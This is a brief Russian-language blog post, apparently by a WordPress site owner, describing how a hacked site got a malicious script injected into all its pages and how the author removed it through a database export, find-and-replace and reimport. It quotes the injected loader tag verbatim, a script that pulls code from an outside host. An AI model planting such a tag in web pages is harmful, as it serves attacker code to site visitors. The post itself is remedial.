Вредоносный код может появиться на страницах Вашего сайта в результате его взлома. Не буду описывать все возможные варианты таких кодов и их расположение. В своей практике я только один раз столкнулся с такой проблемой, которая решилась довольно быстро.

Редактируя страницы на одном сайте, я обнаружил в html-редакторе очень странный небольшой скрипт:

<script src=»http://pngme.ru/seter»></script>

Такой скрипт обнаружил на всех страницах и тем более на всех остальных сайтах. Вопрос — откуда он взялся? Если бы он располагался на одном сайте, то и вопросов бы было меньше. Кроме обновления WordPress на всех сайтах я ничего больше не делал. Первая мыль была о том, что возможно WordPress ввёл какое-то новшество.

Погуглил эту тему в интернете и почти не нашел ответа на этот вопрос. Один только более вразумительный ответ за этот скрипт нашел на одном форуме. Там было написано, что «доброжелатели» установили эти скрипты для «угона мобильного трафика». Я не силён в хакерстве, но думаю, что всё было сделано примерно через проникновение в базу данных. Написал хостеру про этот скрипт, но толком не объяснили, только написали, что при проверке на сайте ничего подозрительного и вредоносного не обнаружилось.

Периодически редактируя страницы, я удалял этот скрипт где он встречался. Проблема обострилась, когда от Гугла стали приходить письма с предупреждением, что сайт был взломан и на его страницах находится вредоносный контент. И вот тогда работа закипела.

Первым делом надо было выяснить что это за вредоносный контент. В этом мне помог плагин WordPress Exploit Scanner. После сканирования он выдаёт кучу информации, как нужной так и не нужной, но все страницы где располагался этот скрипт он показал.

Первый сайт был небольшим, и я все эти скрипты удалил через админку сайта. С остальными было труднее, очень много страниц. Решение было простым. Я импортировал на компьютер по очереди базу данных каждого сайта. Открывал файл базы в редакторе Notepad++ и искал этот скрипт. Чтобы не удалять эти скрипты вручную, воспользуемся функцией «Замена» в редакторе. С помощью комбинации клавиш Ctrl + F вызываем поисковое окошко, и заполняем всё так как показано на скриншоте:

Вредоносный скрипт

Оставив поле «Заменить на:» пустым и нажав на кнопку «Заменить всё», произойдёт удаление всех вставленных скриптов. Не забудьте сохранить файл. Теперь необходимо зайти в phpMyAdmin. Там я полностью удалил все таблицы и по новому загрузил файл исправленной базы данных

Таким способом я очистил и остальные сайты. Думаю, что таким образом избавиться от вредоносных кодов не сложно. И самое главное, не забудьте сменить логин и пароли к базам данных!!!

 

Статья была полезной?